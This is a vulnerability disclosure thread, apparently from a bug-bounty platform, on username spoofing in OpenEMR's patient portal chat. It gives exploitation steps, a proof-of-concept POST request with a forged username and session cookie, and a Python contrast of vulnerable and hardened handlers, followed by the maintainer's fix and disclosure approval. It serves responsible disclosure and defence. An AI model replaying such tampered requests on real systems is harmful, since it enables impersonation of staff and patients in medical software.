Send message in chat function with any username in openemr/openemr

Valid

Reported on

Jul 20th 2022


Description

In the chat function, the username is not validated. We can change the username to any value we want, including one that does not match the logged-in user.

Exploitation steps:

1. Log in with the Phil1 account (a patient account).
2. Send a message via the Burp Suite proxy.
3. Modify the username to any value you want (I used "n00b").
4. As a result, the message is sent from "n00b" rather than from "Phil Belford".

Proof of Concept

POST /openemr/portal/messaging/secure_chat.php?action=save HTTP/1.1
Host: demo.openemr.io
Cookie: username=Phil%20Belford; PortalOpenEMR=wte53yTGjI7VYMcBHd%2C%2CO%2C-qdK6nklsE7Qo2F87g949Hz988
Referer: https://demo.openemr.io/openemr/portal/messaging/secure_chat.php
...

username=n00b&message=message+from+n00b&sender_id=1&recip_id=%5B%22admin%22%5D

POC image: (screenshot not reproduced)

Impact

An attacker can impersonate any user they want, even admin, when chatting with others.
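As an added example (a Python model, not OpenEMR's PHP code and not the project's actual fix), the handler below decodes the PoC body from the report and contrasts the vulnerable pattern, which takes `username` and `sender_id` from the request, with a hardened one that binds the sender to the server-side session and logs any mismatch as a detection signal. The session values are constructed.

```python
import json
from dataclasses import dataclass
from urllib.parse import parse_qs

# Constructed server-side session for the logged-in patient; the user_id is made up.
SESSION = {"user_id": 42, "display_name": "Phil Belford"}

# Request body exactly as shown in the report's proof of concept.
POC_BODY = "username=n00b&message=message+from+n00b&sender_id=1&recip_id=%5B%22admin%22%5D"


@dataclass
class StoredMessage:
    sender_id: int
    username: str
    message: str
    recipients: list


def parse_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body, keeping the first value per key."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def save_message_unsafe(session: dict, form: dict) -> StoredMessage:
    """Vulnerable pattern: sender identity is copied from the POST body, so any
    authenticated user can label a message as coming from someone else."""
    return StoredMessage(int(form["sender_id"]), form["username"],
                         form["message"], json.loads(form["recip_id"]))


def save_message_hardened(session: dict, form: dict, audit_log: list) -> StoredMessage:
    """Hardened pattern: the sender is always the authenticated session user.
    Client-supplied identity fields are ignored, and a mismatch is logged because
    it is a strong signal that someone is probing for exactly this bug class."""
    for key, expected in (("username", session["display_name"]),
                          ("sender_id", str(session["user_id"]))):
        if key in form and form[key] != expected:
            audit_log.append(f"identity mismatch on {key}: "
                             f"session={expected!r} posted={form[key]!r}")
    recipients = json.loads(form.get("recip_id", "[]"))
    if not isinstance(recipients, list) or not all(isinstance(r, str) for r in recipients):
        raise ValueError("recip_id must be a JSON array of usernames")
    return StoredMessage(session["user_id"], session["display_name"],
                         form["message"], recipients)
```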

We are processing your report and will contact the openemr team within 24 hours. a year ago
Lê Thị Mỹ Duyên modified the report
a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
We have sent a follow up to the openemr team. We will try again in 7 days. a year ago
Brady Miller validated this vulnerability a year ago

Thanks for the reports. We are working on a fix.

Lê Thị Mỹ Duyên has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller
a year ago

Maintainer


A preliminary fix has been posted in commit 41b4888a36d68a666995562ff3edb3e55f64b9cd

Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 3-7 weeks. After I do that, it will be ok to make a CVE # and make it public.

Thanks!

We have sent a fix follow up to the openemr team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the openemr team. We will try again in 10 days. a year ago
Brady Miller marked this as fixed in 7.0.0.1 with commit 41b488 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Brady Miller
a year ago

Maintainer


OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.
